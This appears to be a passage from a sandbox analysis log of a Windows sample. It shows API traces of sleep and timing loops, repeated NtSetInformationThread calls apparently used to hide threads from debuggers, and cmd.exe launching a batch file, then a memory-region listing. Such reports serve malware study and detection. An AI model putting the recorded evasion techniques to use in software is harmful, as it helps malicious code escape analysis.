Sleep (dwMilliseconds=0x3e8) [0199.622] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1bc)) [0199.622] GetTickCount () returned 0x1d96444 [0199.622] Sleep (dwMilliseconds=0x3e8) [0199.624] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1be)) [0199.624] GetTickCount () returned 0x1d9682b [0199.624] Sleep (dwMilliseconds=0x3e8) [0199.625] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1bf)) [0199.625] GetTickCount () returned 0x1d96c21 [0199.625] Sleep (dwMilliseconds=0x3e8) [0199.668] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1e2)) [0199.670] GetTickCount () returned 0x1d97028 [0199.670] Sleep (dwMilliseconds=0x3e8) [0199.672] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1e6)) [0199.672] GetTickCount () returned 0x1d9740f [0199.672] Sleep (dwMilliseconds=0x3e8) [0199.673] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1e8)) [0199.674] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.675] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.675] GetCurrentThread () returned 0xfffffffe [0199.675] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.677] GetTickCount () returned 0x1d977f6 [0199.677] Sleep (dwMilliseconds=0x3e8) [0199.684] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1f2)) [0199.684] GetTickCount () returned 0x1d97bec [0199.684] Sleep (dwMilliseconds=0x3e8) [0199.686] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1f4)) [0199.686] GetTickCount () returned 0x1d97fd3 [0199.686] Sleep (dwMilliseconds=0x3e8) [0199.687] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1f5)) [0199.687] GetTickCount () returned 0x1d983ba [0199.692] Sleep (dwMilliseconds=0x3e8) [0199.726] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x21d)) [0199.727] GetTickCount () returned 0x1d987d0 [0199.727] Sleep (dwMilliseconds=0x3e8) [0199.743] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x22d)) [0199.743] GetTickCount () returned 0x1d98bc7 [0199.743] Sleep (dwMilliseconds=0x3e8) [0199.749] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x233)) [0199.749] GetTickCount () returned 0x1d98fae [0199.749] Sleep (dwMilliseconds=0x3e8) [0199.764] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x242)) [0199.765] GetTickCount () returned 0x1d993a4 [0199.765] Sleep (dwMilliseconds=0x3e8) [0199.768] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x246)) [0199.769] GetTickCount () returned 0x1d9978b [0199.769] Sleep (dwMilliseconds=0x3e8) [0199.773] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x24b)) [0199.774] GetTickCount () returned 0x1d99b82 [0199.774] Sleep (dwMilliseconds=0x3e8) [0199.783] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x24f)) [0199.784] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.784] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.784] GetCurrentThread () returned 0xfffffffe [0199.784] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.785] GetTickCount () returned 0x1d99f69 [0199.785] Sleep (dwMilliseconds=0x3e8) [0199.801] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x25e)) [0199.801] GetTickCount () returned 0x1d9a35f [0199.801] Sleep (dwMilliseconds=0x3e8) [0199.813] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x26e)) [0199.813] GetTickCount () returned 0x1d9a756 [0199.813] Sleep (dwMilliseconds=0x3e8) [0199.826] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x27e)) [0199.826] GetTickCount () returned 0x1d9ab4d [0199.826] Sleep (dwMilliseconds=0x3e8) [0199.840] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x28d)) [0199.840] GetTickCount () returned 0x1d9af43 [0199.841] Sleep (dwMilliseconds=0x3e8) [0199.856] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x29d)) [0199.856] GetTickCount () returned 0x1d9b33a [0199.856] Sleep (dwMilliseconds=0x3e8) [0199.934] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x2eb)) [0199.934] GetTickCount () returned 0x1d9b76f [0199.934] Sleep (dwMilliseconds=0x3e8) [0200.005] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x329)) [0200.005] GetTickCount () returned 0x1d9bb94 [0200.005] Sleep (dwMilliseconds=0x3e8) [0200.043] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x358)) [0200.043] GetTickCount () returned 0x1d9bfaa [0200.043] Sleep (dwMilliseconds=0x3e8) [0200.184] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x3e4)) [0200.184] GetTickCount () returned 0x1d9c41d [0200.184] Sleep (dwMilliseconds=0x3e8) [0200.281] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x5a)) [0200.281] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0200.282] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0200.282] GetCurrentThread () returned 0xfffffffe [0200.282] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0200.282] GetTickCount () returned 0x1d9c862 [0200.282] Sleep (dwMilliseconds=0x3e8) [0200.372] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0xb8)) [0200.372] GetTickCount () returned 0x1d9cca7 [0200.372] Sleep (dwMilliseconds=0x3e8) [0200.490] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x125)) [0200.490] GetTickCount () returned 0x1d9d0fb [0200.490] Sleep (dwMilliseconds=0x3e8) [0200.576] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x182)) [0200.576] GetTickCount () returned 0x1d9d53f [0200.576] Sleep (dwMilliseconds=0x3e8) [0200.669] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x1e0)) [0200.669] GetTickCount () returned 0x1d9d984 [0200.669] Sleep (dwMilliseconds=0x3e8) [0200.779] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x24d)) [0200.779] GetTickCount () returned 0x1d9ddd8 [0200.779] Sleep (dwMilliseconds=0x3e8) [0200.871] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x2ab)) [0200.871] GetTickCount () returned 0x1d9e21d [0200.872] Sleep (dwMilliseconds=0x3e8) [0200.991] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x318)) [0200.991] GetTickCount () returned 0x1d9e671 [0200.991] Sleep (dwMilliseconds=0x3e8) [0201.074] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x376)) [0201.074] GetTickCount () returned 0x1d9eab6 [0201.074] Sleep (dwMilliseconds=0x3e8) [0201.232] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x2a)) [0201.232] GetTickCount () returned 0x1d9ef39 [0201.232] Sleep (dwMilliseconds=0x3e8) [0201.404] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0xb6)) [0201.405] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0201.405] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0201.405] GetCurrentThread () returned 0xfffffffe [0201.405] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0201.406] GetTickCount () returned 0x1d9f3ac [0201.406] Sleep (dwMilliseconds=0x3e8) [0201.509] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x123)) [0201.510] GetTickCount () returned 0x1d9f800 [0201.510] Sleep (dwMilliseconds=0x3e8) [0201.604] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x181)) [0201.604] GetTickCount () returned 0x1d9fc45 [0201.604] Sleep (dwMilliseconds=0x3e8) [0201.696] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x1de)) [0201.697] GetTickCount () returned 0x1da0089 [0201.697] Sleep (dwMilliseconds=0x3e8) [0201.806] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x23c)) [0201.807] GetTickCount () returned 0x1da04ce [0201.807] Sleep (dwMilliseconds=0x3e8) [0201.915] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x2a9)) [0201.915] GetTickCount () returned 0x1da0922 [0201.916] Sleep (dwMilliseconds=0x3e8) [0202.009] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x307)) [0202.009] GetTickCount () returned 0x1da0d67 [0202.009] Sleep (dwMilliseconds=0x3e8) [0202.075] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x345)) [0202.075] GetTickCount () returned 0x1da118c [0202.075] Sleep (dwMilliseconds=0x3e8) [0202.231] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x3e1)) [0202.231] GetTickCount () returned 0x1da160f [0202.231] Sleep (dwMilliseconds=0x3e8) [0202.319] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x26, wMilliseconds=0x47)) [0202.319] GetTickCount () returned 0x1da1a44 [0202.319] Sleep (dwMilliseconds=0x3e8) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x33bdb000" os_pid = "0xfe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf34" cmd_line = "C:\\Windows\\system32\\cmd.exe /c c:\\windows\\W_X_C.bat" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1251 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1252 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1253 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1254 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1255 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1256 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1257 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1258 start_va = 0x4a1a0000 end_va = 0x4a1ebfff monitored = 1 entry_point = 0x4a1a829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1259 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1260 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1261 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1262 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1263 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1264 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1265 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1266 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1267 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1268 start_va = 0x210000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1269 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1270 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1271 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1272 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1273 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1274 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1275 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1276 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1277 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1278 start_va = 0x450000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1279 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1280 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1281 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1282 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1283 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1284 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1285 start_va = 0x210000 end_va = 0x276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1286 start_va = 0x3d0000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1287 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1288 start_va = 0x753c0000 end_va = 0x753c6fff monitored = 0 entry_point = 0x753c1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1289 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1290 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1291 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1292 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1293 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1294 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1295 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1296 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1297 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1298 start_va = 0x450000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1299 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1300 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1301 start_va = 0x710000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 1302 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: 